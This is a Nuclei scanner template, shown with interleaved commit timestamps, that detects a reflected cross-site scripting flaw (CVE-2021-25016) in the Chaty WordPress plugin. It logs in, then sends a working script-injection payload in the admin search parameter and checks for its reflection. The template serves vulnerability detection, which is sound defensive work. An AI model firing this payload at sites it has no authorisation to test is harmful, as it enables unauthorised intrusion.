nuclei-templates/http/cves/2021/CVE-2021-25016.yaml

63 lines
2.0 KiB
YAML
Raw Normal View History

2023-10-16 18:37:06 +00:00
id: CVE-2021-25016
info:
2023-10-17 08:16:05 +00:00
name: Chaty < 2.8.2 - Cross-Site Scripting
author: luisfelipe146
2023-10-16 18:37:06 +00:00
severity: medium
description: |
2023-10-17 08:16:05 +00:00
The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.
remediation: Fixed in 2.8.3
2023-10-16 18:37:06 +00:00
reference:
- https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
2023-10-17 08:16:05 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-25016
2023-10-16 18:37:06 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
2023-10-17 08:16:05 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-25016
2023-10-17 08:16:05 +00:00
cwe-id: CWE-79
epss-score: 0.00106
epss-percentile: 0.42986
cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:*
2023-10-16 18:37:06 +00:00
metadata:
verified: true
max-request: 2
vendor: premio
product: chaty
framework: wordpress
2023-10-17 08:16:05 +00:00
publicwww-query: "/wp-content/plugins/chaty/"
tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty
2023-10-16 18:37:06 +00:00
http:
2023-10-17 08:16:05 +00:00
- raw:
2023-10-16 18:37:06 +00:00
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
2023-10-17 08:16:05 +00:00
GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
2023-10-16 18:37:06 +00:00
Host: {{Hostname}}
2023-10-16 18:37:06 +00:00
cookie-reuse: true
2023-10-17 08:16:05 +00:00
matchers-condition: and
2023-10-16 18:37:06 +00:00
matchers:
2023-10-17 08:16:05 +00:00
- type: word
part: body
words:
- "search=</script><img src onerror=alert(document.domain)>"
- "chaty_page_chaty"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100c12284c4202d6e1f4da65cdeebffe1f8a15a76ff677037f4fe42c60f014a28eb02210088c0afed1d41e330d98bca6fb947f9617b88cfb01f0eac35bae254af9f67e068:922c64590222798bb761d5b6d8e72950